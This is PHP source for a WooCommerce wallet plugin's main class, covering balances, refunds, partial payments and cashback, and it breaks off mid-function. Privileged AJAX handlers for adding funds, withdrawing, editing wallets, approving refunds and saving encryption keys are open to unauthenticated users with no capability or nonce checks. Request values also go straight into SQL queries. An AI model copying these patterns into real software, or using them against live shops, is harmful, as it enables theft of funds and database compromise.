<?php

class FS_WC_Wallet {
    
    // Plugin main instance
    public static $_instance = null;
    
    // Array of notification and errors to dispaly
    public $notices = array();
	
	public static $remove_partial_payment = '0';
    
    
    function __construct() {
        
        // check if WooCommerce is intalled and active
        if(! in_array('woocommerce/woocommerce.php', apply_filters('active_plugins', get_option('active_plugins')))) {
            
            $this->notices[] = __('WooCommerce need to be installed and activated to be able to use "WooCommerce Wallet".', 'fsww');
            
        }
		
		if(isset($_COOKIE['fsww_remove_partial_payment']) && $_COOKIE['fsww_remove_partial_payment'] == '1') {
			
			self::$remove_partial_payment = '1';
			
		}
        
        
        // Add actions
        $this->add_actions();
        
        // Add filters
        $this->add_filters();
        
        // Add AJAX actions
        $this->plugin_ajax_actions();
        
        // Add shortcodes
        $this->add_shortcodes();
        
        // Add my account endpoints
        $this->add_endpoints();
        
    }
    
    function add_refund_request_button($actions, $order) {
        
        global $wpdb;
        
        $status = $wpdb->get_var("SELECT status FROM {$wpdb->prefix}fswcwallet_requests WHERE order_id={$order->get_id()}");
		
        if($status == 'requested') {
            
             echo '<button class="button">' . __('Cancel Refund Request', 'fsww')   . '</button>';
                    
        } elseif($status == 'refunded') {
            
            echo '<button class="button" disabled>' . __('Already Refunded', 'fsww')   . '</button>';

        } elseif($status == 'rejected') {
            
            echo '<button class="button" disabled>' . __('Request Rejected', 'fsww')   . '</button>';
            
        }
        else {
            
            echo '<a href="' . admin_url('admin-ajax.php?action=fsww_rr&order_id=' . $order->get_id()) . '" class="button">' . __('Request Refund', 'fsww')  . '</a>';
            
        }
        
        
		return $actions;
        
	}
    
    function make_refund_request_callback() {
        
        global $wpdb;
        
        $order_id        = $_GET['order_id'];
        $request_date    = date('Y-m-d H:i:s');
        $status          = 'requested';
        
        $data = array(
            'order_id'         => $order_id,
            'request_date'     => $request_date,
            'status'           => $status
        );
        
        $wpdb->insert("{$wpdb->prefix}fswcwallet_requests", $data);
        
        wp_safe_redirect(wp_get_referer() ? wp_get_referer() : get_permalink(get_option('woocommerce_myaccount_page_id')));
        
    }
    
    
    // Redirect to chechout if its a wallet cretit product
    function redirect_to_checkout() {
        
        global $woocommerce;

		if(isset($_REQUEST['fsww_add_product'])) {
			
			$product_id = (int) apply_filters('woocommerce_add_to_cart_product_id', $_REQUEST['add-to-cart']);

			if(has_term('fsww-wallet-credit', 'product_cat', $product_id)){

				wc_clear_notices();
				return $woocommerce->cart->get_checkout_url();

			}

		}

			
    }

    // Remove wallet credit items from the cart
    function clear_cart_items($cart_item_data) {
        
        global $woocommerce;
        
        foreach($woocommerce->cart->get_cart() as $cart_item_key => $cart_item){
            
            if(has_term('fsww-wallet-credit', 'product_cat', $cart_item['product_id'])){
                
                global $woocommerce;
                
                $woocommerce->cart->set_quantity($cart_item_key, 0);
                
            }
            
        }
        
        return $cart_item_data;
        
    }

    
    
    function custom_cart_button_text() {
        
        global $product;
				
        if(has_term('fsww-wallet-credit', 'product_cat', $product->get_id()))
            return __('Buy Now', 'woocommerce');

        /** default */
        return __('Add to cart', 'woocommerce');
        
    }
    
    
    // Hide credit products
    function hide_credit_products($query) {
    
        if (!is_admin() && !isset($query->query['fsww_sc'])) {
            $query->set('tax_query', array(array(
                'taxonomy' => 'product_cat',
                'field' => 'slug',
                'terms' => array('fsww-wallet-credit'),
                'operator' => 'NOT IN'
            )));
        }
        
        remove_action('pre_get_posts', 'hide_credit_products'); 
        
    }
    
    // AJAX Actions
    public function plugin_ajax_actions() {
        
        add_action('wp_ajax_fsww_add_funds', array($this, 'add_funds_callback'));
        add_action('wp_ajax_nopriv_fsww_add_funds', array($this, 'add_funds_callback'));
        
        add_action('wp_ajax_fsww_edit_wallet', array($this, 'fsww_edit_wallet_callback'));
        add_action('wp_ajax_nopriv_fsww_edit_wallet', array($this, 'fsww_edit_wallet_callback'));
        
        add_action('wp_ajax_fsww_rr', array($this, 'make_refund_request_callback'));
        add_action('wp_ajax_nopriv_fsww_rr', array($this, 'make_refund_request_callback'));
        
        
        add_action('wp_ajax_fsww_refund', array($this, 'fsww_refund_callback'));
        add_action('wp_ajax_nopriv_fsww_refund', array($this, 'fsww_refund_callback'));
        
        add_action('wp_ajax_fsww_reject', array($this, 'fsww_reject_callback'));
        add_action('wp_ajax_nopriv_fsww_reject', array($this, 'fsww_reject_callback'));
        
        // Wallet actions
        add_action('wp_ajax_fsww_i_add_funds', array($this, 'fsww_i_add_funds_request'));
        add_action('wp_ajax_nopriv_fsww_i_add_funds', array($this, 'fsww_i_add_funds_request'));
        
        add_action('wp_ajax_fsww_i_withdraw', array($this, 'fsww_i_withdraw_request'));
        add_action('wp_ajax_nopriv_fsww_i_withdraw', array($this, 'fsww_i_withdraw_request'));
        
        add_action('wp_ajax_fsww_i_lock', array($this, 'fsww_i_lock_request'));
        add_action('wp_ajax_nopriv_fsww_i_lock', array($this, 'fsww_i_lock_request'));
        
        add_action('wp_ajax_fsww_user_tansactions', array($this, 'fsww_user_tansactions_callback'));
        add_action('wp_ajax_nopriv_fsww_user_tansactions', array($this, 'fsww_user_tansactions_callback'));
        
        add_action('wp_ajax_fsww_save_encryption_setting', array($this, 'save_encryption_setting'));
        add_action('wp_ajax_nopriv_fsww_save_encryption_setting', array($this, 'save_encryption_setting'));
        
    }
    
    public function save_encryption_setting() {
        
        $key = $_POST['fsww_encryption_key'];
        $vi = $_POST['fsww_encryption_vi'];

        $this->set_encryption_key($key, $vi, 'update');

        $link = admin_url('admin.php?page=fsww-settings&tab=encryption');
        wp_redirect($link);
        die();
        
    }
    
    public function fsww_user_tansactions_callback() {
        
        require_once(dirname(__FILE__) . '/../transactions_table_html.php');

        transactions_table_html($_POST['user_id']);
        
        die();
        
    }
    
    // Refund
    public function fsww_refund_callback() {
    
        global $wpdb;
        
        
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $request_id      = $_POST['request_id'];
        $status          = 'refunded';
        
        $data = array(
            'status'           => $status
        );
        
        $where = array(
            'request_id'       => $request_id
        );
        
        $order_id = $wpdb->get_var("SELECT order_id FROM {$wpdb->prefix}fswcwallet_requests WHERE request_id={$request_id}");
        
        $order          = wc_get_order($order_id);
        $amount         = $order->get_total();
        
        $user           = $order->get_user_id();
        
		
		//Parial payment
        $fees         = $order->get_fees();
        $total_fees   = 0; 
        
        $transaction_found = false;
        
        foreach($fees as $fee) {
            
            if($fee['tax_class'] == 'fsww_pfw'  || $fee['name'] == __('Payed From Wallet', 'fsww')) {
             
                $total_fees += abs(floatval($fee['line_total']));
                $transaction_found = true;
                
            }
            
        }        
          
        if($transaction_found) {
            
			$amount         = $amount + $total_fees;
            
        }
		
		
		
		//End Parial payment
		
        
        Wallet::refund($user, $amount, $order_id);
        
        $wpdb->update("{$wpdb->prefix}fswcwallet_requests", $data, $where);
        
        
        $link = admin_url('admin.php?page=fsww-rr&r');
        wp_redirect($link);
        die();
        
    }
    
    // Reject refund request
    public function fsww_reject_callback() {
            
        global $wpdb;
        
        $request_id      = $_POST['request_id'];
        $status          = 'rejected';
        
        $data = array(
            'status'           => $status
        );
        
        $where = array(
            'request_id'       => $request_id
        );
        
        $wpdb->update("{$wpdb->prefix}fswcwallet_requests", $data, $where);
        
        
        $link = admin_url('admin.php?page=fsww-rr');
        wp_redirect($link);
        die();
        
    }
    
    public function fsww_edit_wallet_callback() {
        
        global $wpdb;
        
        $user_id              = $_POST['user_id'];
        $balance              = FS_WC_Wallet::encrypt_decrypt('encrypt', $_POST['balance']);
        $total_spent          = FS_WC_Wallet::encrypt_decrypt('encrypt', $_POST['total_spent']);
        $status               = $_POST['status'];
        $lock_message         = $_POST['lock_message'];
        
        $last_deposit_month   = $_POST['last_deposit_month'];
        $last_deposit_day     = $_POST['last_deposit_day'];
        $last_deposit_year    = $_POST['last_deposit_year'];
        
        $data = array(
            'balance'       => $balance,
            'last_deposit'  => $last_deposit_year . '-' . $last_deposit_month . '-' . $last_deposit_day . ' ' . date('H:i:s'),
            'total_spent'   => $total_spent,
            'status'        => $status,
            'lock_message'  => $lock_message
        );
        
        $where = array(
            'user_id'       => $user_id
        );
        
        $wpdb->update("{$wpdb->prefix}fswcwallet", $data, $where);
        
        //die('<pre>' . print_r($data, true) . '</pre>');
        
        $link = admin_url('admin.php?page=fsww-wallets');
        wp_redirect($link);
        die();
        
    }
    
    public function fsww_i_add_funds_request() {
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $user_id  = $_POST['user_id'];
        $amount   = $_POST['amount'];
        $message  = $_POST['message'];
        $notify   = $_POST['notify'];
        
        if($notify == 'on') {
            
            $message    = '<p>' . wc_price($amount) . ' ' . __('Have been added to your account balance', 'fsww') . '</p><br>' . $message;
            $subject    = __('Funds Have been added to your account', 'fsww');
            $heading    = __('Funds Have been added to your account', 'fsww');
            
            $this->send_email($user_id, $message, $subject, $heading);
            
        }
       
        Wallet::add_funds($user_id, $amount);
        
        $link = admin_url('admin.php?page=fsww-wallets');
        wp_redirect($link);
        die();
        
    }
    
    public function fsww_i_withdraw_request() {
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $user_id  = $_POST['user_id'];
        $amount   = $_POST['amount'];
        $message  = $_POST['message'];
        $notify   = $_POST['notify'];
        
        if($notify == 'on') {
            
            $message    = '<p>' . wc_price($amount) . ' ' . __('Have been withdrawed from your account balance', 'fsww') . '</p><br>' . $message;
            $subject    = __('Funds Have been withdrawed from your account', 'fsww');
            $heading    = __('Funds Have been withdrawed from your account', 'fsww');
            
            $this->send_email($user_id, $message, $subject, $heading);
            
        }
        
        Wallet::withdraw_funds($user_id, $amount);
        
        $link = admin_url('admin.php?page=fsww-wallets');
        wp_redirect($link);
        die();
        
    }
    
    public function fsww_i_lock_request() {
        
        //die('<pre>' . print_r($_POST, true) . '</pre>');
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $user_id  = $_POST['user_id'];
        $action   = $_POST['fsww_action'];
        $message  = $_POST['message'];
        $notify   = $_POST['notify'];
        
        
        if($action == 'lock') {
            
            Wallet::lock_account($user_id, $message);
            
            if($notify == 'on') {
            
                $message    = '<p>'.  __('Your wallet balance have been locked, you can nolonger use it to pay for products.', 'fsww') . '</p><br>' . $message;
                $subject    = __('Your account have been locked', 'fsww');
                $heading    = __('Your account have been locked', 'fsww');

                $this->send_email($user_id, $message, $subject, $heading);

            }
            
        } elseif ($action == 'unlock') {
            
            Wallet::unlock_account($user_id);
            
            if($notify == 'on') {
            
                $message    = '<p>'.  __('Your wallet balance have been unlocked.', 'fsww') . '</p><br>' . $message;
                $subject    = __('Your account have been unlocked', 'fsww');
                $heading    = __('Your account have been unlocked', 'fsww');

                $this->send_email($user_id, $message, $subject, $heading);

            }
            
        }
        
        $link = admin_url('admin.php?page=fsww-wallets');
        wp_redirect($link);
        die();
        
    }
    
    
    // Send emails
    public function send_email($user_id, $message, $subject, $heading) {
        
        global $woocommerce;

        $username       = get_user_by('id', $user_id);
        
        $to = $username->user_email;

        if(!$to || '' == trim($to)) {
            
            return false;
            
        }

        $headers = apply_filters('woocommerce_email_headers', '', 'rewards_message');
        $attachments = array();
    

        $mailer = $woocommerce->mailer();

        $message = $mailer->wrap_message($heading, $message);
        
        $mailer->send($to, $subject, $message, $headers, $attachments);

    }
    
    // Add actions
    public function add_actions() {
        
        add_action('wp_loaded', array($this, 'register_styles'));
        add_action('wp_loaded', array($this, 'register_scripts'));
        
        add_action('init', array($this, 'plugin_init'));
        
        //add_action('init', array($this, 'fs_dms'));
        
        add_action('admin_notices', array($this, 'admin_notices'));
        
        // Add Wallets sub menu
        add_action('admin_menu', array($this, 'add_menu_items'));
        
        // Hide credit products
        add_action('pre_get_posts',  array($this, 'hide_credit_products'));
        
        add_action('woocommerce_before_checkout_form', array($this, 'account_alerts'));
        
        add_action('admin_init', array($this, 'register_custom_setting'));
        
        add_action('woocommerce_order_status_completed',  array($this, 'add_credits_to_user_account')); 
        
        if(get_option('fsww_partial_payments', 'on') == 'on') {
            
			
			add_action('init', array($this, 'parial_payment_cookie'), 1);
			add_action('woocommerce_before_cart_table', array($this, 'partial_payment_add_remove'), 1);
            add_action('woocommerce_cart_calculate_fees', array($this, 'custom_wc_add_fee'), 1);
			
			add_action('woocommerce_checkout_order_processed', array($this, 'partial_payment'), 1, 1);
            
        }
        
        add_action('wp_enqueue_scripts', array($this, 'additional_custom_styles'));
        		
        add_action('woocommerce_order_status_cancelled', array($this, 'cancelled_order'), 10, 1);
		
		add_action('category_add_form_fields', array($this, 'tutorialshares_taxonomy_add_new_meta_field'), 10, 2);
		
		add_action('woocommerce_product_options_general_product_data', array($this, 'woo_add_custom_general_fields') );
		
		add_action('woocommerce_variation_options', array($this, 'woo_add_custom_variable_fields'), 1, 3);

		// Save Fields
		add_action('woocommerce_process_product_meta', array($this, 'woo_add_custom_general_fields_save'), 1);
		add_action('woocommerce_process_product_meta_variable', array($this, 'woo_add_custom_variable_fields_save'), 1);
		
		add_action('woocommerce_ajax_save_product_variations', array($this, 'woo_add_custom_variable_fields_save_ajax'), 10, 2);
        
		add_action('woocommerce_payment_complete_order_status', array($this, 'cashback'), 10, 2 );
		
		//add_action('woocommerce_refund_created', array($this, 'process_refunds'), 10, 2);

		
		
    }
	
	function partial_payment_add_remove() {
		
		$cart_page_url = WC()->cart->get_cart_url();

		if(self::$remove_partial_payment == '0') {
			
			echo '<div class="woocommerce-message">';
			echo '	  <a href="' . $cart_page_url . '?fsww_remove_partial_payment=1" class="button">' . __('Remove', 'fsww') . '</a> ' . __('Would you like to remove wallet partial payment?', 'fsww');
			echo '</div>';
			
		}else if(self::$remove_partial_payment == '1') {
			
			echo '<div class="woocommerce-message">';
			echo '	  <a href="' . $cart_page_url . '?fsww_remove_partial_payment=0" class="button">' . __('Add', 'fsww') . '</a> ' . __('Would you like to add wallet partial payment?', 'fsww');
			echo '</div>';
			
		}
		
	}
	
	function parial_payment_cookie() {
		
		if(isset($_GET['fsww_remove_partial_payment']) && $_GET['fsww_remove_partial_payment'] == 1) {
			
			self::$remove_partial_payment = '1';
			setcookie('fsww_remove_partial_payment', '1', time() + (3600), "/");
			
		}
		
		if(isset($_GET['fsww_remove_partial_payment']) && $_GET['fsww_remove_partial_payment'] == 0) {
			
			self::$remove_partial_payment = '0';
			setcookie('fsww_remove_partial_payment', '0', time() + (3600), "/");
			
		}
		
		
		
	}
	
	function process_refunds($refund_id, $refund) {
			
		if(!isset($_POST['fsww_refund_action'])) {
			
			require_once(dirname(__FILE__) . '/Wallet.php');
		
			$order = wc_get_order($refund['order_id']);

			Wallet::add_funds($order->get_user_id(), floatval($refund['amount']), $refund['order_id']);

		}
		
	}
	

	function woo_add_custom_general_fields() {

		global $woocommerce, $post;

		// Text Field creation*
		woocommerce_wp_text_input( 
			array( 
				'id'          => '_fsww_credit', 
				'label'       => __('Wallet Credit', 'fsww'), 
				'placeholder' => '',
				'desc_tip'    => 'true',
				'description' => __('Enter the wallet credit given after purchasing this product', 'fsww'),
				'value'	      => get_post_meta($post->ID, '_fsww_credit', true)	
			)
		);/**/
		
		woocommerce_wp_text_input( 
			array( 
				'id'          => '_fsww_cashback' . '', 
				'label'       => __('Wallet Cashback', 'fsww'), 
				'placeholder' => '',
				'desc_tip'    => 'true',
				'description' => __('Enter the wallet cashback amount given after purchasing this product<br><br>Enter an exact value, or a value ending with % to give a percentage or leave empty for no cashback', 'fsww'),
				'value'	      => get_post_meta($post->ID, '_fsww_cashback', true)	
			)
		);
	
	}
	
	function woo_add_custom_variable_fields($loop, $variation_data, $variation) {
		
		woocommerce_wp_text_input( 
			array( 
				'id'          => '_fsww_cashback['.$loop.']', 
				'label'       => __('Wallet Cashback', 'fsww'), 
				'placeholder' => '',
				'desc_tip'    => 'true',
				'description' => __('Enter the wallet cashback amount given after purchasing this product<br><br>Enter an exact value, or a value ending with % to give a percentage or leave empty for no cashback', 'fsww'),
				'value'	      => get_post_meta($variation->ID, '_fsww_cashback', true)
			)
		);
		
	}
	
	function woo_add_custom_general_fields_save($post_id){

		$product = wc_get_product($post_id);
		
		if(isset($_POST['_fsww_credit'])) {
			
			$fsww_credit = $_POST['_fsww_credit'];
			update_post_meta($post_id, '_fsww_credit', esc_html($fsww_credit));
			
		}

		if($product->is_type('simple')){
			
			if(isset($_POST['_fsww_cashback'])) {

				$fsww_cashback = $_POST['_fsww_cashback'];
				update_post_meta($post_id, '_fsww_cashback', esc_html($fsww_cashback));

			}
			
		}
		
	}
	
	function woo_add_custom_variable_fields_save($post_id){
		
		if(isset($_POST['variable_sku'])) {
			
			$variable_sku = $_POST['variable_sku'];
			$variable_post_id = $_POST['variable_post_id'];
			
			$variable_custom_field = $_POST['_fsww_cashback'];
			
			for($i = 0; $i < sizeof($variable_sku); $i++) {
				
				$variation_id = (int) $variable_post_id[$i];
				
				if(isset($variable_custom_field[$i])) {
					
					update_post_meta($variation_id, '_fsww_cashback', esc_html($variable_custom_field[$i]));
					
				}
				
			}
			
		}
		
	}
	
	function woo_add_custom_variable_fields_save_ajax($array = array(), $int = 0){
		
		if(isset($_POST['variable_sku'])) {
			
			$variable_sku = $_POST['variable_sku'];
			$variable_post_id = $_POST['variable_post_id'];
			
			$variable_custom_field = $_POST['_fsww_cashback'];
			
			for($i = 0; $i < sizeof($variable_sku); $i++) {
				
				$variation_id = (int) $variable_post_id[$i];
				
				if(isset($variable_custom_field[$i])) {
					
					update_post_meta($variation_id, '_fsww_cashback', esc_html($variable_custom_field[$i]));
					
				}
				
			}
			
		}
		
	}
	
    
    public function cancelled_order($order_id) {
		
		global $wpdb;
        
        
        
        require_once(dirname(__FILE__) . '/Wallet.php');
              
        $order          = wc_get_order($order_id);
        
        $user           = $order->get_user_id();
        
		
		//Parial payment
        $fees         = $order->get_fees();
        $total_fees   = 0; 
        
        $transaction_found = false;
        
        foreach($fees as $fee) {
            
            if($fee['tax_class'] == 'fsww_pfw'  || $fee['name'] == __('Payed From Wallet', 'fsww')) {
             
                $total_fees += abs(floatval($fee['line_total']));
                $transaction_found = true;
                
            }
            
        }        
          
        if($transaction_found) {
            
			$amount         = $amount + $total_fees;
            
        }
		
		
		
		//End Parial payment
		
        
        Wallet::refund($user, $amount, 0);
		
	}
	
    public function partial_payment($order_id) {
        
 
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $order        = wc_get_order($order_id);
        $fees         = $order->get_fees();
        $user_id      = $order->get_user_id();
        $total_fees   = 0; 
        
        $transaction_found = false;
        
        foreach($fees as $fee) {
            
            if($fee['tax_class'] == 'fsww_pfw'  || $fee['name'] == __('Payed From Wallet', 'fsww')) {
             
                $total_fees += abs(floatval($fee['line_total']));
                $transaction_found = true;
                
            }
            
        }        
          
        if($transaction_found) {
            
            $balance      = floatval(Wallet::get_balance($user_id));
            $balance_new  = $balance - floatval($woocommerce->cart->total);

            Wallet::withdraw_funds($user_id, $total_fees, $order_id);
            Wallet::add_spending($user_id, $total_fees);
            
        }
        
        
       
        
        
        return true;
        
    }
    
    public function custom_wc_add_fee($cart) {
        
        require_once(dirname(__FILE__) . '/Gateway.php');
        
        $WC_Gateway_FSWW = new WC_Gateway_FSWW('fsww');
        
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        global $woocommerce;
        
        if(!is_user_logged_in()) {
            
            return false;
        
        }
        
        $status   = Wallet::lock_status(get_current_user_id());
        
        if($status['status'] == 'locked') {
                
            return false;
            
        }
        
        foreach($woocommerce->cart->get_cart() as $cart_item_key => $cart_item){
            
            if(has_term('fsww-wallet-credit', 'product_cat', $cart_item['product_id'])){
                
                return false;
                
            }
            
        }
        
        if(!$WC_Gateway_FSWW->enable_for_virtual) {

            if(WC()->cart && WC()->cart->needs_shipping()) {
                
                return false;
                
            }
            
            if(is_page(wc_get_page_id('checkout')) && get_query_var('order-pay') > 0) {
                
                $order_id   = absint(get_query_var('order-pay'));                    
                $order      = wc_get_order($order_id);
                
                $needs_shipping = false;
				if (0 < sizeof($order->get_items())) {
                    
					foreach ($order->get_items() as $item) {
                        
						$_product = $order->get_product_from_item($item);

						if ( $_product->needs_shipping()) {
                            
							$needs_shipping = true;
							break;
                            
						}
                        
					}
                    
				}
                
				$needs_shipping = apply_filters('woocommerce_cart_needs_shipping', $needs_shipping);
				if ($needs_shipping) {
                    
                    return false;
                    
                }
                
            }
            
        }
        
        
        if(!empty($WC_Gateway_FSWW->enable_for_methods)) {
            
            $chosen_shipping_methods = array();
            $chosen_shipping_methods_session = WC()->session->get('chosen_shipping_methods');
            
            if(isset($chosen_shipping_methods_session))	{
                
				$chosen_shipping_methods = array_unique($chosen_shipping_methods_session);
                
			}

			$check_method = false;

			if(is_object($order)) {
                
				if($order->shipping_method) {
					
                    $check_method = $order->shipping_method;
                    
				}

			} elseif (empty($chosen_shipping_methods) || sizeof($chosen_shipping_methods) > 1) {
                
				$check_method = false;
                
			} elseif (sizeof($chosen_shipping_methods) == 1) {
                
				$check_method = $chosen_shipping_methods[0];
                
			}

			if (!$check_method) {
                
                return false;
                
            }
				
			$found = false;

			foreach($WC_Gateway_FSWW->enable_for_methods as $method_id ) {
				
                if(strpos($check_method, $method_id) === 0) {
                    
					$found = true;
					break;
                    
				}
                
			}

			if (!$found) {
                return false;
            }
				
        }
        
        $balance = Wallet::get_balance(get_current_user_id());
        $total   = floatval($cart->cart_contents_total);
        
        if(($total > $balance) && ($balance > 0)) {
                 
			if(self::$remove_partial_payment == '0') {
				
				WC()->cart->add_fee(__('Payed From Wallet', 'fsww'), -$balance, true, 'fsww_pfw');
				
			}
            
            
        }
        
        unset($WC_Gateway_FSWW);
        
    }
    
    public function add_credits_to_user_account($order_id){
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $order = wc_get_order($order_id);
        
        if (count($order->get_items()) > 0){
            
            foreach ($order->get_items() as $item) {
                
                $credit_product     = false;
                
                $product_id         = $item['product_id'];
                $term_list          = get_the_terms($product_id, 'product_cat');
                
                //echo '<pre>' . print_r($term_list, true) . '</pre>';
                
                foreach($term_list as $term) {
                    
                    if($term->slug == 'fsww-wallet-credit') {
                        
                        $credit_product = true;
                        
                    }
                    
                }
                
                if($credit_product) {
                    
                    $_product       = wc_get_product($product_id);
					
					$credit 		= get_post_meta($product_id, '_fsww_credit', true);
					$amount         = $_product->get_regular_price();
					
					if($credit != "") {
						
						/*WCB*/
                    	$amount         = get_post_meta($product_id, '_fsww_credit', true);
						
					}
					                    
                    Wallet::add_funds($order->get_user_id(), $amount);
                    
                }
                
            }
        }
        
        
    }
    
    
    // Add shortcode
    public function add_shortcodes() {
        
        add_shortcode('fsww_deposit', array($this, 'shortcode_make_deposit'));
        
        add_shortcode('fsww_balance', array($this, 'shortcode_user_balance'));
		
        add_shortcode('fsww_transactions_history', array($this, 'shortcode_transactions_history'));
        
    }
    
    public function shortcode_user_balance($sc_args) {
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $output         = '';
        $user_id        = get_current_user_id();
        $balance        = wc_price(Wallet::get_balance($user_id));
        //$username       = get_user_by('id', $user_id);
        //$username       = $username->user_login;
        
        $output         = /*$username . ' &ndash; ' . */$balance;
        
        return $output;
        
    }
	
	public function shortcode_transactions_history($sc_args) {
        		
		require_once(dirname(__FILE__) . '/../transactions_table_html.php');
		
  
        $output         = transactions_table_html(get_current_user_id(), true);
		
        
        return $output;
        
    }
    
    public function shortcode_make_deposit($sc_args) {

        if(!is_user_logged_in()) {
            return false;
        }

        $options = '';
        
        $args = array( 
            'post_type'        => 'product', 
            'posts_per_page'   => 1000, 
            'product_cat'      => 'fsww-wallet-credit',
            'fsww_sc'          => 'show',
            'orderby'          => 'meta_value_num',
            'meta_key'         => '_price',
            'order'            => 'asc'
        );
        
        $loop = new WP_Query($args);
        
        while($loop->have_posts()) {
            
            $loop->the_post(); 
            global $product; 
            
                $options .= '<option value="' . get_the_ID() . '">' . get_the_title() . '</option>';

         }
        
        wp_reset_query();
        
        $output = '
        
        <style>

            .fsww-meke-deposit-sc {
                
            }
            
            .fsww-select {
                display: block;
                
                margin-bottom: 16px !important;
                max-width: 320px !important;
                width: 100% !important;
            }
            
        </style>
        
        <div class="fsww-meke-deposit-sc">
            <h4>' . __('How much would you like to deposit?', 'fsww') . '</h4>

            <form id="add_to_cart" method="post">
                <input type="hidden" name="add-to-cart" value="">
                <input type="hidden" name="fsww_add_product" value="1">

                <select class="fsww-select" name="add-to-cart">
                    ' . $options . '
                </select>

                <input type="submit" value="' . __('Make Deposit', 'fsww') . '">

            </form>
        </div>';
        
        return $output;
        
    }
    
    public function register_custom_setting() {
        
        register_setting('fsww_general_options_group', 'fsww_refunds');
        register_setting('fsww_general_options_group', 'fsww_refund_rate');
        register_setting('fsww_general_options_group', 'fsww_partial_payments');
        register_setting('fsww_general_options_group', 'fsww_show_balance_in_menu');
        register_setting('fsww_general_options_group', 'fsww_rows_per_page');
        register_setting('fsww_general_options_group', 'fsww_order_status');
        
    }
    
    public function account_alerts() { 
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $notices  = '<div class="woocommerce-info">';
        
        $status   = Wallet::lock_status(get_current_user_id());
        
        $show     = false;
        
        $fees     = WC()->cart->get_fees();
        
        $transaction_found = false;
        
        foreach($fees as $fee) {
            
            if($fee->tax_class == 'fsww_pfw' || $fee->name == __('Payed From Wallet', 'fsww')) {
             
                return true;
                
            }
            
        }    
        
        if($status['status'] == 'locked') {
                
            $notices .= __('Your wallet credit is locked for the following reason:', 'fsww') . '<br><b>' . $status['lock_message'] . '<br>' . __('If you think there is an error please contact us.', 'fsww') . '</b>';
            $show     = true;
            
        } 
        
        $notices .= '</div>';
        
        if($show) {
            
            echo $notices;    
            
        }
        
    }
    
    public function check_balance() {
        
        global $woocommerce;
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $balance  = floatval(Wallet::get_balance(get_current_user_id()));
        $total    = floatval($woocommerce->cart->total);
        
        if($balance >= $total) {
                
            return true;
            
        }
        
        return false;
        
    }
    
    // Add filters
    public function add_filters() {
        
        // Add payment gatway
		
		add_filter('woocommerce_payment_gateways', array($this, 'gateway'));
		   
        
        add_filter('woocommerce_product_add_to_cart_text', array($this, 'custom_cart_button_text'));
        add_filter('woocommerce_product_single_add_to_cart_text', array($this, 'custom_cart_button_text'));    // 2.1 +
        
        // Redirect to chechout if its a wallet cretit product
		if((get_option('woocommerce_cart_redirect_after_add') === 'yes') || (isset($_REQUEST['fsww_add_product']))) {
			
			add_filter('woocommerce_add_to_cart_redirect',  array($this, 'redirect_to_checkout'));
			
		}
        
        
        // Rempve wallet credit items from the cart
        add_filter('woocommerce_add_cart_item_data',  array($this, 'clear_cart_items'));
        
        if(get_option('fsww_refunds', 'on') == 'on') {
            
            add_filter('woocommerce_my_account_my_orders_actions', array($this,'add_refund_request_button'), 100, 2);
            
        }
        
        add_filter('widget_text','do_shortcode');
        
        if(get_option('fsww_show_balance_in_menu', 'on') == 'on') {
            
            add_filter('wp_nav_menu_items', array($this, 'in_menu_balance'), 10, 2);
            
        }
		
		add_filter('woocommerce_get_price_html', array($this, 'custom_price_message'), 10, 2);
		
		add_filter('woocommerce_available_variation', array($this, 'custom_price_message_variation'), 10, 3);
         
    }
	
	function cashback($order_status, $order_id) {
		
		$order = wc_get_order($order_id);
		
		if($order->get_payment_method() != 'fsww') {
		
		
			require_once(dirname(__FILE__) . '/Wallet.php');

			$order = wc_get_order($order_id);

			if (count($order->get_items()) > 0){

				foreach ($order->get_items() as $item) {

					$product_id     = $item['product_id'];
					$variation_id   = $item['variation_id'];
					$subtotal       = $item['subtotal'];
					$amount         = '0';
					$cashback_value = '';

					
					/*//////////////*
					echo '<pre>'; 
					print_r($item);
					/**/
					if($variation_id == 0) {
						
						$cashback_value = get_post_meta($product_id, '_fsww_cashback', true);
						
					}else {
						
						$cashback_value = get_post_meta($variation_id, '_fsww_cashback', true);
						
					}

					if($cashback_value != '') { 

						if(strpos($cashback_value, '%') === false ) {

							$amount = $cashback_value;

						}else {

							$cashback_value = rtrim($cashback_value, "%");
							$amount         = ($subtotal)*($cashback_value/100);

						}

						Wallet::add_funds($order->get_user_id(), $amount);

					}

				}
				//die();
			}

		}

		return $order_status;
		
	}
	
	
	function custom_price_message_variation($data, $product, $variation) {
		
		$cashback = '';
		
		$cashback_value = get_post_meta($variation->get_ID(), '_fsww_cashback', true);
			
		if($cashback_value != '') { 

			if(strpos($cashback_value, '%') === false ) {

				$cashback_value = wc_price($cashback_value);

			}

			$cashback = ' | ' . $cashback_value . __(' Cashback');

		}
		
		$data['price_html'] = $data['price_html'] . $cashback;
		return $data;
	}
	
	function custom_price_message($price) {
		
		global $product;
		
		$cashback = '';
		
		if($product != null) {
			
			if($product->is_type('simple')) {
			
				$cashback_value = get_post_meta($product->get_id(), '_fsww_cashback', true);

				if($cashback_value != '') { 

					if(strpos($cashback_value, '%') === false ) {

						$cashback_value = wc_price($cashback_value);

					}

					$cashback = ' | ' . $cashback_value . __(' Cashback');

				}

			}
			
		}
	
		return $price . $cashback;
	
	}

    public function in_menu_balance($items, $args) {
		
        
        if (strpos(strtolower($args->menu->slug), 'primary') !== false) {
            
            require_once(dirname(__FILE__) . '/Wallet.php');
        
            $output         = '';
            $user_id        = get_current_user_id();
            $balance        = wc_price(Wallet::get_balance($user_id));

            $output         = __('Balance', 'fsww') . ' &ndash; ' . $balance;

            $items         .= '<li class="menu-item menu-item-type-custom menu-item-object-custom fsww-balance"><a href="#">' . $output . '</a></li>';
            
        }
        
        return $items;
        
    }
    
    // Add funds callback
    public function add_funds_callback() {
        
        require_once(dirname(__FILE__) . '/Wallet.php');
        
        $user_id              = $_POST['user_id'];
        $balance              = $_POST['balance'];
        $total_spent          = $_POST['total_spent'];
        $status               = $_POST['status'];
        
        Wallet::create_wallet($user_id, $balance, $total_spent, $status);
